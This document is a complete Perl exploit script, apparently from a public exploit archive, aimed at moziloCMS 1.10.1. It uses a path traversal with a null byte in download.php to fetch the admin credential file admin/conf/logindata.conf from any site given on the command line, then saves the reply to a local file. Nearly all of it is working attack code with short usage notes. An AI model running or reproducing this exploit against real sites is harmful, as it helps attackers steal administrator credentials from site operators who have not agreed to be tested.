#!/usr/bin/perl # # moziloCMS 1.10.1 Perl exploit # # discovered & written by Ams # ax330d [doggy] gmail [dot] com # # DESCRIPTION: # Vulnerability hides in "download.php", which we can use to download any file we want to. # Here, for example, "admin/conf/logindata.conf". (Btw, not very smart solution to keep it open # not looking on that it is protected by .htaccess) # Script does not filters global params, it only checks whether local file exists... # (By the way, all downloads are logged to "/conf/downloads.conf") # # USAGE: # Run exploit :perl expl.pl http://www.site.com # # NEEDED: # magic_quotes_gpc = off # use strict; use IO::Socket; print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n\t\t moziloCMS 1.10.1 exploit (by Ams) \n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; if(@ARGV<1){ die "\n\tUsage:\texpl.pl [host]\n\n \n\tExample:\texpl.pl http://localhost/blog/\n\n"; } my $expl_url = $ARGV[0]; print "\n\t[~] Starting exploit...\n"; if($expl_url =~ m#http://#) { exploit($expl_url); } else { exploit('http://'.$expl_url); } sub exploit { # Defining vars. my $site = pop @_; my ($a, $b, $c, @d) = split /\//,$site; my $path = join('/',@d); my $host = $c; if($path) {$path = '/'.$path;} my ($length, $packet, $downloaded, $injection); # Revealing /data/sess.php. print "\n\t[~] Sending request to 'downloads.php'...\n"; $injection = "file=hola&cat=../admin/conf/logindata.conf%00"; $length = length($injection); $packet = "POST $path/download.php HTTP/1.1\r\n"; $packet .= "Host: $host\r\n"; $packet .= "Connection: Close\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: $length\r\n\r\n"; $packet .= "$injection"; $downloaded = send_surprise($host, $packet, 1); if($downloaded =~ /hackin/) { print "\n\t[-] Exploiting failed...\n"; } elsif ($downloaded =~ /200 OK/) { # Parsing and saving received data. $downloaded =~ /\r\n\r\n/ ; $downloaded = $'; open(DOWNL, ">hola.txt"); print DOWNL $downloaded; close(DOWNL); print "\n\t[+] Looks like ok! Check hola.txt\n"; } else { print "\n\t[-] Exploiting failed...\n"; } } sub send_surprise() { my $dat = 1; my ($host, $packet, $ret) = @_; my $socket=IO::Socket::INET->new( Proto=>"tcp", PeerAddr=>$host, PeerPort=>"80" ); if( ! $socket) { return 0; } else { print $socket $packet; if($ret) { my $rcv; while($rcv = <$socket>) { $dat .= $rcv; } } close ($socket); return $dat; } }